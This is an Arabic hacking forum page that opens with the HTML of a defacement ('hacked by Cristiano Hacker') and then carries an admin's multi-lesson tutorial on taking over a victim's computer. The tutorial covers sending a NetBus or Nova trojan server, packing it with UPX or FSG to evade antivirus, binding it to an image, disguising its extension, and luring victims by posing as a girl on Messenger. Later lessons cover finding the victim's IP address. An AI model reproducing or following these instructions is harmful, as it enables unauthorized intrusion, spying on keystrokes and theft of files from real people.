منتدى الهواوي
<html dir="rtl">

<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>تم الاختراق من قبل كرستيانو هكر</title>
<style>
<!--
p
{
color: #333333;
font: bold 12pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
-->
</style>
<meta name="keywords" content="تم الاختراق من قبل كرستيانو هكر">
<meta name="description" content="تم الاختراق من قبل كرستيانو هكر">
<bgsound src="http://www.falsafh.net/files/11895.mp3" loop="-1">
</head>

<body bgcolor="#000000">

<p align="center"><font color="#FFFFFF" size="7" face="Microsoft Sans Serif">
تم الاختراق من قبل</font><font color="#008000" size="6" face="Microsoft Sans Serif">
</font><font face="Microsoft Sans Serif" size="7" color="#008000">كرستيانوهكر</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">هذا
الاختراق بسبب شخص معين يعرف نفسه..!</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
ماتركت لي مجال بس الله يصبرني<span lang="en-us"> </span>بس Sad : /
<span lang="en-us">~</span></font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
حبيته الشخص من قلب بس هو ماعطاني قلبه</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
فهاذا اندكس الوداع من المنتدى انا وقروبي</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
قروب منضمة الهكرالعالمي  الي رفعو</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
منتداك بعد ماكان ماله اي معنا  يوم كان المنتدى</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
باسم الهواوي والحين تطاول ع القروب عشان بنت</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
ماعاش من يطاول ع قروبي قروب منضمة الهكر العالمي</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
وانا موجود وتقبل الاختراق بكل روح رياضيه</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
وسعة صدر وطولت بال لانك انت الي بديت به الشيى</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
وهذا جزات من يطاول ع القروب ابي اخليك عبره لكل</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">شخص
يفكر فيوم يقلل من حق قروبنا </font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000"> <br>
تم الاختراق من قبل كرستيانو هكر ولم اضهر لكم حقيقة</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000"> الوجه
الثاني الذي امتلكه</font></p>
<p align="center"><font face="Microsoft Sans Serif" size="7" color="#008000">
<br>
نوريكم بعض ماتملك من الاشياء الخفيه للوجه الاخر..!</font></p>
<p align="center"> </p>
<p align="center"><br>
 </p>
<p align="center"> </p>
<p align="center">
<img border="0" alt="" src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash2/hs205.ash2/46834_1530998428314_1035355739_2375199_329437_n.jpg"></p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font color="#ffffff" size="6" face="Microsoft Sans Serif">
===================</font><font color="#008000" size="6" face="Microsoft Sans Serif">====================</font></p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font size="7" color="#FFFFFF">كرستيانوهكر</font></p>
<p align="center"><span lang="en-us">
<font color="#FFFFFF" size="6" face="Microsoft Sans Serif">pk3</font><font color="#008000" size="6" face="Microsoft Sans Serif">@</font><font color="#ffffff" size="6" face="Microsoft Sans Serif">HotM4il</font><font color="#008000" size="6" face="Microsoft Sans Serif">.</font><font color="#ffffff" size="6" face="Microsoft Sans Serif">Com</font></span></p>
<p align="center"> </p>
<p align="center"><font color="#008000" size="6" face="Microsoft Sans Serif">ان
</font><font color="#ffffff" size="6" face="Microsoft Sans Serif">طآل</font><font color="#008000" size="6" face="Microsoft Sans Serif">
الزمآن </font><font color="#ffffff" size="6" face="Microsoft Sans Serif">فلم</font><font color="#008000" size="6" face="Microsoft Sans Serif">
تروني </font><font color="#ffffff" size="6" face="Microsoft Sans Serif">فهذي</font><font color="#008000" size="6" face="Microsoft Sans Serif">
اخترآقآت </font><font color="#ffffff" size="6" face="Microsoft Sans Serif">يدي</font><font color="#008000" size="6" face="Microsoft Sans Serif">
فتذكروني</font></p>
<p align="center"><span lang="en-us">
<font color="#ffffff" size="6" face="Microsoft Sans Serif">From </font>
<font color="#008000" size="6" face="Microsoft Sans Serif"><u>Saudi</u></font><font color="#ffffff" size="6" face="Microsoft Sans Serif">
Arabia</font></span></p>
<p align="center"><font face="Microsoft Sans Serif" size="6" color="#FFFFFF">
اهداء الى قروب منضمة الهكر العالمي بدون استثناء</font></p>
<p align="center"><span lang="en-us">
<font face="Microsoft Sans Serif" size="6" color="#FFFFFF">(</font></span></p>
<p align="center"><font face="Microsoft Sans Serif" size="6" color="#FFFFFF">
<span lang="en-us">)</span></font></p>
<p align="center"><font face="Microsoft Sans Serif" size="6" color="#FFFFFF">(</font></p>
<div style="TEXT-ALIGN: center">
<br>
 
<table style="TEXT-ALIGN: left; WIDTH: 100%" id="table1" border="1" cellSpacing="2" cellPadding="2">
<tr>
<td style="text-align: center; color: rgb(47,96,139); font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">جون
سينا هكر</span></font></td>
<td style="text-align: center; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
ابوفهد هكر</span></font></td>
<td style="text-align: center; color: rgb(47,96,139); font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
لذعه هكر</span></font></td>
<td style="text-align: center; color: rgb(47,96,139); font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
اندومي هكر</span></font></td>
</tr>
<tr>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
s<font size="4">sq64@hotmail.com</font></td>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font SIZE="4" COLOR="#808080"><span LANG="EN">e6x@hotmail.com</span></font></td>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font size="4">osp-@hotmail.com</font></td>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font size="4">indomie21@hotmail.com</font></td>
</tr>
</table>
<br>
<br>
 
<table style="TEXT-ALIGN: left; WIDTH: 100%" id="table2" border="1" cellSpacing="2" cellPadding="2">
<tr>
<td style="text-align: center; color: rgb(47,96,139); font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
الحنش الاسود هكر</span></font></td>
<td style="text-align: center; color: rgb(47,96,139); font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
سلطان هكر</span></font></td>
<td style="text-align: center; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif">
<font size="4" color="#008000"><span style="font-family: Tahoma">
فهودي هكر</span></font></td>
</tr>
<tr>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font size="4">xwzd122@hotmail.com</font></td>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font size="4">s-sultan99@hotmail.com</font></td>
<td style="text-align: center; font-family: Comic Sans MS; color: #333333; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12pt">
<font size="4">zzxxn2011@hotmail.com</font></td>
</tr>
</table>
<p> </p>
<p><big><big><span style="FONT-FAMILY: Tahoma"><big><span lang="en-us">
<span style="FONT-FAMILY: Microsoft Sans Serif; COLOR: white; FONT-WEIGHT: bold">
From </span><font color="#008000">
<span style="FONT-FAMILY: Microsoft Sans Serif; FONT-WEIGHT: bold; text-decoration:underline">
ksa</span></font></span><span style="FONT-FAMILY: Microsoft Sans Serif; COLOR: white; FONT-WEIGHT: bold" lang="en-us">
Arabic</span><span style="FONT-FAMILY: Microsoft Sans Serif; COLOR: white; FONT-WEIGHT: bold"><br>
 </span></big></span></big></big></div>
<p align="center"> </p>
<p align="center">
<embed height="0" name="video1" type="audio/x-pn-realaudio-plugin" pluginspage="http://www.real.com/player/" width="0" src="http://www.falsafh.net/files/11895.mp3" true loop="true" autostart="true" nojava="true" controls="ControlPanel,StatusBar" maintainaspect="false"></p>

</body>

</html>


يــــرحـــب بـــــــــكـــم
 
الرئيسيةالتسجيلدخول
مواضيع مماثلة
  • » تعلم الاختراق من الالف الى الياء
  • » اهم انواع العسل في سلطنة عمان
  • » كتاب صيدلانى لجميع انواع الموبيلات بصيغةJar
  • » بسعر الجملة للمستهلك كل انواع المشايات والعجل الرياضى فقط لدينا توصيل مجانى
  • » جميع اوامر الدوس
  • » جميع الشفرات العملة
  • » جميع مواقع فك تشفير md5
  • » جميع اصدار ات برنامج ostaze
  • » جميع برامج انشاء اللعبة
  • » جميع اغاني نادى النصر السعودي
  • بحـث
     
     

    نتائج البحث
     
    Rechercher بحث متقدم
    المواضيع الأخيرة
    » البورت 21 الخاص بالاختراق
    الجمعة مايو 02, 2014 8:31 am من طرف ahmed gadam

    » اقوى برنامج اختراق
    الأربعاء أبريل 17, 2013 12:43 pm من طرف سيف العراق

    » تحميل برنامج هكر الاميلات سهل الاستعمال
    الثلاثاء أبريل 09, 2013 12:49 pm من طرف عبد صافي

    » شات العراق الصوتي
    السبت فبراير 16, 2013 2:56 pm من طرف bb_aa43

    » شرح حرق اي اميل وبعد حرقه تقدر تسويه من جديد الان وحصريا لا يفوتك
    السبت فبراير 02, 2013 3:22 am من طرف احمد الوائلي

    » برنامج هكر الاميلات الهوت مل سهل الاستعمال
    الجمعة يناير 11, 2013 11:31 am من طرف صلاح الياسري

    » فوائد الماء البارد للوجه
    الأربعاء يناير 09, 2013 10:18 pm من طرف wessam

    »  المرأة السعودية مسرح بلا خشبة
    الإثنين سبتمبر 17, 2012 9:06 am من طرف كافي

    » شرح طريقة استرجاع البسورد حق الاميل بسهوله
    الجمعة أغسطس 24, 2012 3:35 am من طرف انس الوني

    ازرار التصفُّح
     البوابة
     الرئيسية
     قائمة الاعضاء
     البيانات الشخصية
     س .و .ج
     بحـث
    منتدي هواوي
    التبادل الاعلاني
    احداث منتدى مجاني
    شاطر | 
     

     شرح جميع انواع الاختراق

    استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
    كاتب الموضوعرسالة
    جون سينا هكر
    المدير العام
    المدير العام


    عدد المساهمات: 64
    نقاط: 132
    تاريخ التسجيل: 15/04/2011

    مُساهمةموضوع: شرح جميع انواع الاختراق    السبت مايو 14, 2011 9:39 pm

    مرحبا اصدقائي
    اضع بين ايديكم اليوم شرح عملي للاختراق خطوه بخطوه
    وسيتضمن هذا الموضوع 9 دروس هي كالتالي:

    1)مقدمه
    2)برامج اختراق واستخدامها
    3) اعداد الباتش
    4) تشفير الباتش
    5) دمج الباتش +تغيير امتداده
    6) فن ارسال الباتش
    7) طرق معرفة اي بي الضحيه
    Cool البحث العشوائي عن الثغرات
    9) حماية جهازك
    مع خالص تحياتي لكم مخترق سابق عمرة

    ملاحظه: بعض هذه الشروحات سيكون منقولا..
    وبعض الوصلات لا تعمل






    الدرس الاول
    مقدمه



    كما قلت عزيزي القارئ انني ساشرح الطريقه العمليه للاختراق ..
    اي انني سابتعد عن التعمق في الشروحات النظريه في هذه المرحله
    كما ترون ففي توقيعي يوجد ثلاثة دروس للمبتدئين تفيدكم في الشروحات النظريه
    ومن جهتي اتركوها الان


    والان لنبدأ:
    كيف نخترق جهاز معين..
    تخيل عزيزي القارئ انك تريد اقتحام بيت معين فماذا يلزمك لكي تقتحمه
    شيئان اساسيان
    1) معرفة عنوان البيت.. طبعا لا تستطيع دخول بيت بدون معرفة اي يقع
    2) وجود باب او شباك صغير تو اي فتحه صغيره تستطيع الدخول منها لهذا البيت فلنسميها ثغره

    كذلك الامر اصدقائي بالنسبه لاجهزه الكمبيوتر
    لنفرض اننا نريد اختراق جهاز شخص يدعى "مايكل" ومايكل طبعا ليس عربيا..
    فماذا يجب علينا ان نعرف في البدايه؟؟
    كما قلت
    1) عنوان جهاز مايكل او ما يسمى IP
    2) وجود ثغره في جهازه لكي تمكننا من الدخول عبرها = PORT

    جميل جدا..
    الان مايكل معنا على الماسنجر وكل ما عرفناه اننا نريد اقتحام جهازه لذا يجب معرفة عنوان جهازه .. الاي بي
    والثغرات الموجوده به
    جميل جدا ...

    كيف نعرف الاي بي؟؟
    هناك درس مخصص لذلك وقد تعمدت هذا لكي تقرأون كل الدروس وبعدها تبدأون بالتنفيذ

    الاي بي يكون عباره عن اربع مجموعات من الارقام تفصلها نقاط وكل مجموعا تحوي 3 ارقام على الاكثر

    امثله للاي بي
    212.199.200.144
    62.144.124.16
    60.2.5.232

    ملاحظه كل مجموعه تتراوح بين 0 و 255

    البورت
    هو عباره عن رقم عادة ما يكون من 3 او 4 او 5 منازل
    امثله للبورت:
    1245
    23
    12456
    6666
    19
    1025

    ولا يوجد جهاز في العالم بدون بورتات..
    طالما ان الجهاز متصل بالانترنت فهناك بورتات
    ولنفرض اننا فحصنا جهاز مايكل ووجدنا به 6 بورتات مفتوحه.. ولكن لا شئ يفيدنا منها اذ اننا لا نستطيع الدخول في هذه المرحله من اي بورت منها لجهازه

    وظيفتنا في هذه المرحله ان نفتح بورت نحن نختاره في جهاز مايكل
    كما لو اننا ذهبنا لاقتحام بيت واخذنا معنا مقدح لكي نفنح ثغره في جدار البيت لكي ندخل منها بعد ذلك

    فتح الثغره هي عن طريق برامج الاختراق
    وهي موضوع الدرس الثاني...
    اما عن كيفية فحص جهاز مايكل في ليست هدفنا في اول بضعة دروس.. اذا انه لا يهمنا فحص الثغرات بقدر ما يهمنا فتح الثغره التي نريدها
    مايكل ما زال معنا وفي انتظار تادرس الثاني
    سيأتي قريبا



    الدرس الثاني+الثالث
    برامج الاختراق وتحرير الباتش
    مرحبا اصدقائي ..
    في الدرس القادم قلت ان هدفنا هو فتح ثغره للدخول عن طريقها الى جهاز الضحيه
    ونستخدم برامج الاختراق.. لهذا الغرض اي لفتح جهاز الضحيه

    برامج الاختراق تتكون عادة من 3 ملفات

    1) ملف السيرفر.. او الباتش او التروجان كما يحلو لك ان تسميه
    2) ملف البرنامج الرئيسي.. وهو لفتح البرنامج والتحكم من خلاله بجهاز الضحيه
    3) ملف تحرير الباتش ومن خلاله نحدث تغييرات على عمل الباتش اي اننا نعمل باتش على ذوقنا

    اذن كيف نفتح الثغره في جهاز الضحيه؟
    حسنا.. هذا هو عمل الباتش او السيرفر.. وهو بمثابة عميل للبرنامج اي اه يجب علينا ارسال هذا الباتش للضحيه وعليه فتحه .. وعندها سيفتح عنده الباتش.. وبواسطه عنوان ال ip لجهازه والبورت الخاص بالبرنامج ندخل الى جهازه..

    هيا بنا الى شرح عملي..

    لنبدأ بشرح برنامج بسيط جدا جدا جدا للمبتدئين جدا جدا وهو فعال جدا جدا

    netbus 1.7
    انا شخصيا اعشق هذا البرنامج لانه كان بدايتي في الاختراق..

    عند تحميل البرنامج ستجد فقط ملفان رئيسيان ..
    1) ملف البرنامج واسمه netbus على شكل دولاب حديدي..
    2) ملف الباتش وهو على هذا الشكل:

    ولا يوجد لهذا البرنامج ملف تحرير الباتش
    لماذا؟
    اسألوا مبرمج البرنامج خخخخخخخخخخخخ

    ماذا عليك ان تفعل
    ارسل الملف لمايكل (متذكرينه؟) واخترق مباشرة وهذا هو
    اي ملف نرسل ؟؟
    طبعا ملف الباتش وايااااااااااااااااكم ان تفتحوه في جهازكم لان البورت او الثغره الخاصه بالبرنامج ستفتح مباشرة في جهازكم وستصبحون عرضه لاختراق ال netbus ..


    اذا سنرسل ملف الباتش لمايكل وسيستقبله ويفتحه وعندها يقول لكم ان الملف لا يعمل
    ولكنه في الحقيقه يعمل ونسخ نفسه ايضا في بدء تشغيل الويندوز وفي مجحلد الويندوز .. وقد فتح البورت عند مايكل المسكين
    ولكن انتبهوا .. اي مكافح فيروسات يستطيع التقاط هذا الباتش وغيره وغيره
    لماذا يلتقطوه؟؟ لانهم يعتبروه فايروس ضار بالمجتمع والانسانيه خخخخخخخخخخ

    الحل؟؟؟ انتظروا حتى درس التشفير

    الان نكمل ما بدأنا به..

    ارسلنا الباتش لمايكل وهو استقبله وفتحه وفتح عنده البورت ..
    وبورت النت باس هو 12345 .. يلا عيشوا :

    ماذا يبقى عليكم ... ؟

    ان تفتحوا ملف البرنامج وليس الباتش
    اكرر وليس الباتش
    وعندما تفتحون البرنامج تجدون ما يلي:




    اذا ... نبدا الشرح

    في الاعلي في خانة ال host name/ip تكتب رقم ال ip الخاص بمايكل الذي استقبل الملف

    وبجانبه رقم البورت الذي هو 12345 .. اتركه كما هو
    واضغط على زر connect الذي هو تحت خانة البورت

    وانتظر ختى يتصل بجهاز الضحيه
    كيف تعرف ان اتصل ام لا
    انظر في اسفل النافذه مكتوب no connection عندما يتصل سيكتب connected to ورقم الاي بي الخاص بمايكل... عندها بكل بساطه تكون انت قد اخترقت جهاز مايكل

    الان خيارات البرنامج ساذكر بعضها باختصار:

    open cd rom: اضغط عليه فتفتح السيدي عند مايكل اضغط مره اخرى يغلق وهكذا
    show image: لاظهار صوره في جهازه
    swap mouse: لعكس حركة الماوس
    start program: ابدا برنامج معين في جهازه
    msg menneger: لاجراء محادقه بينك وبينه
    screendump: لاخذ صوره لسطح مكتبه
    getinfo: للحصول على معلومات عن جهازه
    listen: لمشاهدة ما يكتب ومساعدته او الكتابه عنه خخخخخخخخخخخخ
    control mouse: التحم بالماوس بجهاز مايكل .. اي انه يتحرك مثل حركة ماوسك بدون ان بلمسه
    server setup: لنسخ سيرفر عنده
    go to url: لفتح صفحة انترنت عند مايكل
    file menneger: اجمل خيار لمشاهدة كل ملفاته وسرقة شئ منها او حذف اي شئ او نسخ من جهازك لجهازه

    وبالنسبه لباقي الخيارات اظنها واضحه

    هذا هو برنامج النت باس بكل بساطه...


    ما عليك الا ان ترسل الباتش وتعرف الاي بي وتخترق وهذا هو
    كيف تعرف الاي بي؟
    لا تستعجل
    هناك درس مخصص لهذا..
    ملاحظه: في نهاية هذا الدرس ساضع وصلة تحميل ال netbus1.7 بأذن الله

    لننتقل لبرنامج اختراق معقد اكثر وللمتقدمين اكثر ويحتاج باتشه الى تحرير..
    عن طريق تحرير الباتش تحدد انه عندما يفتح الباتش في جهاز الضحيه يرسل لك رسائل على ايمايلك .. مع الاي بي .. ويوجد باتشات ترسل اي باسوورد تجده في جهاز الضحيه وما الى ذلك


    البرنامج هو برنامج النوفا الشهير..


    بعد تحرير الباتش الباقي يكون نفس الفكره
    ارسال الباتش ثم الاختراق عن طريق البرنامج التابع للباتش
    وكل برنامج يعمل على بورت معين


    ولكن لا اخفي عليكم ... هذا ليس كل شئ
    الباتش هو ذا امتداد EXE دائما .. ومستخدمو الانترنت يخافون من هذه الملفات ثم ان مضادات الفايروس مثل النورتون والمكافي تكشف هذه الملفات ... فكم من الناس تتوقع ان تخترق اذا قرات اهذا الدرس واوقفت؟
    بلغة اخرى كل غبي لا يستخدم برامج حمايه ضد الفيروسات ولا يفرف امتداد EXE من امتداد صوره

    انا شخصيا لا اعرف الكثير منهم..

    لذا ما سياتي هو الاهم!!!


    شرح البرنامج

    ادخل هنا لتجد وصلة تحميل البرنامج وشرحه:


    اضغط هنا

    تحياتي
    الدرس الرابع
    تشفير الباتش

    طيب الان وبعد ان شرحنا برامج الاختراق

    كل ما لدينا الان هو باتش جاهز لنرسله لمايكل..

    لكن الامر ليس بهذه السهوله
    اذ ان الانتي فايروس يكتشف معظم الباتشات المستخدمه من قبل برامج الاختراق...
    ومن الواضح ان معظم مستخدمي الانترنت في جهازهم يوجد انتي فايروس

    ومعظمهم اما نورتون او مكافي !!!!

    فاذا ارسلت الباتش لمايكل سيكتشفه النورتون او غيره
    ما الحل اذا...

    اسهل حل هو تشفير الباتش
    لكي لا يستطيع النورتون او المكافي اكتشافه

    من اشهر هذه البرامج هي ال upx وال fsg



    ادخل هنا لتجد شرح برنالمج FSG للتشفير
    الدرس الخامس
    دمج الباتش وتغيير امتداده



    الان ما حصلنا عليه بعد التشفير هو باتش مشفر
    صحيح

    وعندما نرسله لمايكل سيفتحه ولكنه لن يعمل معه ولكن في الحقيقه فان الباتش قد اشتغل في جعازه وفتح الثغره

    ولكن لكي يكون الامر ذا مصداقيه اكثر
    فما رايكم لو نرسل له صوره
    يفتحها ويعطينا رايه بها
    وبنفس الوقت عندما يفتحها يفتح معه الباتش؟؟
    فكره رائعه صحيح؟

    اذا... هنا تأتي فكرة دمج الباتش بصوره
    ولهذا الغرض يا احبابي
    برنامج مثل المحرر العربي:
    *********************************

    المحرر العربي
    بعد تحميل البرنامج وفك ضغطه..
    سيظهر لك ملفان احدهما اسمه المحرر وهو ملف البرنامج

    لكي تدمج الباتش مع صوره يجب نسخ الصوره والباتش(السيرفر) في مجلد البرنامج
    لاحظوا الصوره التاليه التي هي بعد دمج الباتش:


    اوكي..
    الان كيف يتم الدمج
    كما قلت في الاعلى .. يجب نسخ الباتش(السيرفر) والصوره في مجلد البرنامج...ومفضل ان تكون صوره ذات حجم صغير .. مثلا ان تقلل من جودتها في برنامج الفوتوشوب لكي يصغر حجمها..
    ونفتح البرنامج (اسمه المحرر.. اي انك تضغط على ملف المحرر.. الذي موجود في اعلى الصوره من اليمين)..

    فيفتح لك البرنامج وهذا هو:






    1) نختار دمج الملف مع صوره
    2) نضغط لاختيار السيرفر.. فتفتح لنا نافذه صغيره جدا وهي ما يحتويه مجلد البرنامج .. فنختار منها السيرفر المراد دمجه.. وفي الصوره ... اسميت السيرفر me ...
    3) نضغط لاختيار الطعم.. اي الصوره المراد دمجها مع الباتش ونفس الشئ يفتح نافذه بها محتويات المجلد نختار منها الصوره التي نسخناها به.. وعندي الصوره اسمها 6bed (مفضل ان يكون حجمها صغير)

    ملاحظه : مفضل ان يكون الباتش مشفر ومضغوط عن طريق اي برنامج تشفير..

    4) نضغط لصنع الملف المدموج وهو كما هو موضح في الصوره العليا ... الملف الخامس قد نتج بعد الضغط


    كما ترون البرنامج بسيط جدا وباللغه العربيه..
    وتاكد قبل فتح البرنامج ان حجم الملف حوالي 30 كيلوبايت... لئلا يكون مدموج بشئ اخر!!!

    لتحميل البرنامج اضغط هنا:
    برنامج المحرر العربي

    ملاحظه : اضغط بالزر الايمن على الرابط واختار حفظ هدف بأسم ... SAVE TARGET AS

    ******************************


    بعد ان دمجت الباتش مع صوره
    اذا حاولت ارساله عن طريق الماسنجر.. فلن يظهر امتداده exe مع انه في الحقيقه يكون امتداد exe
    وان كان مايكل ذكيا.... سيفحص الامتداد وسيستغرب ان صوره انتدادها exe وبالتالي لن يفتح الملف وسيحذفه ويعملكم بلوك
    وبالتالي ستخسرون ضحيه عزيزه

    الحل هو في تغيير امتداد الباتش...

    اليكم هذه الطريقه الفعاله وبدون ان يفقد الباتش مفعوله:

    انسخ الباتش والصقه في الوورد باد بعدين روح edit وروح لــ package Object بعدين روح الى
    edit packge بعدين روح edit واضغط copy package وروح والصقه في اي مكان بتشوفه
    بالامتداد shs ....ولا يكشفه ولا حمايه الان وقد تشفر الباتش وتم دمجه وتغيير امتداده
    فهو جاهز للارسال!!!!
    تحياتي


    الدرس السادس
    فن ارسال الباتش (السيرفر)

    الان يا اصدقائي كما قلت في الدرس السابق اصبح لدينا باتش مشفر ومدموج ومغير امتداده ولم يبقى علينا الا ارساله للضحيه
    ولارسال الباتش هناك ايضا فن
    اذا ان الكثير من الضحايا يخافون استقبال الملفات الا من الاشخاص الضين يثقون بهم تماما
    ولنفرض ان هذا سيكون حال مايكل ايضا

    على فكره...
    لست مجبورا ان تطبق كل الخطوات من الدمج وتغيير الامتداد
    فأنك تستطيع مثلا الاستغناء عن الدمج او تغيير الامتداد او حتى التشفير او ثلاثتهم معا...
    ولكن هكذا يكون اضمن بكثير خصوصا مع التشفير الذي اصبح شيئا اساسيا في الاختراق بالبرامج

    والان كيف نرسل الباتش لمايكل..

    ولهذا سأذكر عدة طرق
    1) عن طريق الماسنجر
    2) عن طريق الايمايل
    3) تحميل الباتش على صفحة انترنت
    4) Downloader
    5) وضعه بالمنتديات

    1) عن طريق الماسنجر
    طبعا نقول لمايكل اننا نريد ان نرسل له ملف.. وهذا الامر يحتاج الى ذكاء من المخترق..
    فمثلا انا شخصيا انجح اختراقاتي كانت عند دخولي بايمايل خاص بأسم فتاه.. وبعد ان اتكلم مع الشاب على الماسنجر اضع صورة فتاه على انها صورتي.. في الماسنجر الاصدار 6 ... ولا يكون واضح الوجه.. وعندها سيجن جنونه ويطلب الصوره كامله... وبعد تفكير سارسلها له وطبعا ستكون مدموجه مع الباتش المشفر..
    ولكل شخص طريقته في التلاعب على مايكل (الضحيه) ... لكي يأخد الصوره او الملف وهو فرح

    2) عن طريق الايمايل نفس الفكره للتي قبلها
    ولكن في الهوتمايل يوجد مكافي قوي جدا .. جرب ال fsg للتشفير.. تجده في موضوع طلبات البرامج المثبت وان لم تجده اطلبه هناك ومن عيوني

    3)تحميل الباتش على صفحة انترنت
    طبعا كل مستخدم انترنت متقدم او هاكر يكون عنده صفحه شخصيه في موقع يعطي صفحات مجانيه مثل http://www.malware-site.www/ تستطيع تحميل الملف هناك على انه اغنيه او لعبه او صوره.. ومن التجربه الضحايا يفضلون التحميل من الانترنت حتى لو كان الموقع غير مضمون (للمساعده انا جاهز)

    4)dowloaderاقوى الطرق لارسال الباتش للضحايا العنيده
    برنامج fearless downloader v2.0
    عن طريق هذا البرنامج تستطيع صنع باتش صغير جدا جدا وعندما ترسله لمايكل ويضغط عليه سوف يبدا بتحميل الباتش من اي مكان بالانترنت انت حددته (على الاغلب الباتش الذي انت حملته على الانترنت) وطبعا يتم التحميل بدون ان يساله..



    ادخل هنا وستجد البرنامج في اعلى القائمه .. اضغط عليه لتحمله:
    اضغط هنا

    5) وضع الباتش بالمنتديات
    طبعا عن طريق التسجيل بالمنتديات (ليست العربيه ولا حتى تفكر بهذا الامر) ... وتضع الباتش هناك بعد ان يصقوا بك
    الدرس السابع
    طرق الحصول على الاي بي



    الان ما يلزمنا غير ارسال الباتش هو معرفة اي بي مايكل
    كيف ذلك؟؟

    قبل ذلك كيف تعرف الاي بي الخاص بك انت؟
    اذهب الى الدوس
    start >>> run
    واكتب command
    او cmd

    ستفتح لك شاشة الدوس
    اكتب ipconfig
    سيظهر لك الاي بي الخاص بك

    طريقه اخرى:
    وانت في الدوس ايضا اكتب..
    netstat -n
    ستظهر لك قائمه... انظر الى العامود الذي في يسار الشاشه... هذا الاي بي الخاص بك.


    كيف تعرف ip مايكل؟؟


    طريقة كشف الايبي عند استلام بريد :-
    عند فتح البريد الخاص بالهوت ميل أفتح Options ثم أضغط على Mail Display Settings ثم ستجد Message Headers غيرة وضعه على Advanced ثم إذهب إلى البريد وستجد رقم الايبي مكتوب

    طريقة كشف الايبي عند أرسال بريد :-
    عندما تريد أرسال الرساله يجب ان تكتب بعد ايميل الضحية .confirm.to
    مثلا : إذا كان ايميل الضحية michel@hotmail.com يجب ان تكتبة michel@hotmail.com.confirm.to ثم ترسل الرسالة وعند ما يفتح الضحية البريد المرسل له سيصلك ايميل فيه ايبي الضحية

    طريقة كشف الايبي من الدوس :-
    عندما تقوم بإرسال ملف إلى شخص أفتح الدوز واكتب netstat -n لاحظ وجود مسافة بينهم وعند كتابتك لهذا الامر سيظهر لك ايبي الشخص الذي تقوم بإرسال الملف له ... لاحظ ان هذه الطريقه هي اكثر الطرق شيوعا اذك انك في نفس الوقت الذي ترسل به الباتش تذهب للدوس وتكتب الامر.. القائمه التي في يسار الشاشه هي الاي بي الخاص بك.. اما التي على يمينها .. فهي الايبيات التي انت متصل معها .. واي بي مايكل سيكون الاخير منهم طبعا.. ولكن كل هذا يجب ان يكون في حين انك ما زلت ترسل له الباتش.

    طريقة كشف الايبي من الـ mIRC :-
    هذه الطريقة اعتقد ان الجميع يعرفها فقط اكتب /dsn ثم اكتب نك نيم الضحية وسيظهر لك الايبي

    - طريقة كشف الايبي في الايسكيو :-
    تستطيع كشف الايبي عن طريق الايسكيو وهو برنامج صغير الحجم يقوم بهذه العمله عند تنزيلة اغلق الايسكيو وضعه في نفس ملف الايسكيو وأضغط على b_IPShow.exe ويجد ملفان مع البرنامج لإلغاء الأثرايز أضغط عليهما للتشغيل AutoUpdate(w2k).reg و AutoUpdate(w9x).reg ثم قم بتشغيل الايسكيو وإذهب إلى معلومات الشخص وستجد الايبي ولاكن هذا البرنامج يعمل على ICQ2000b

    عن طريق برنامج الجدار الناري
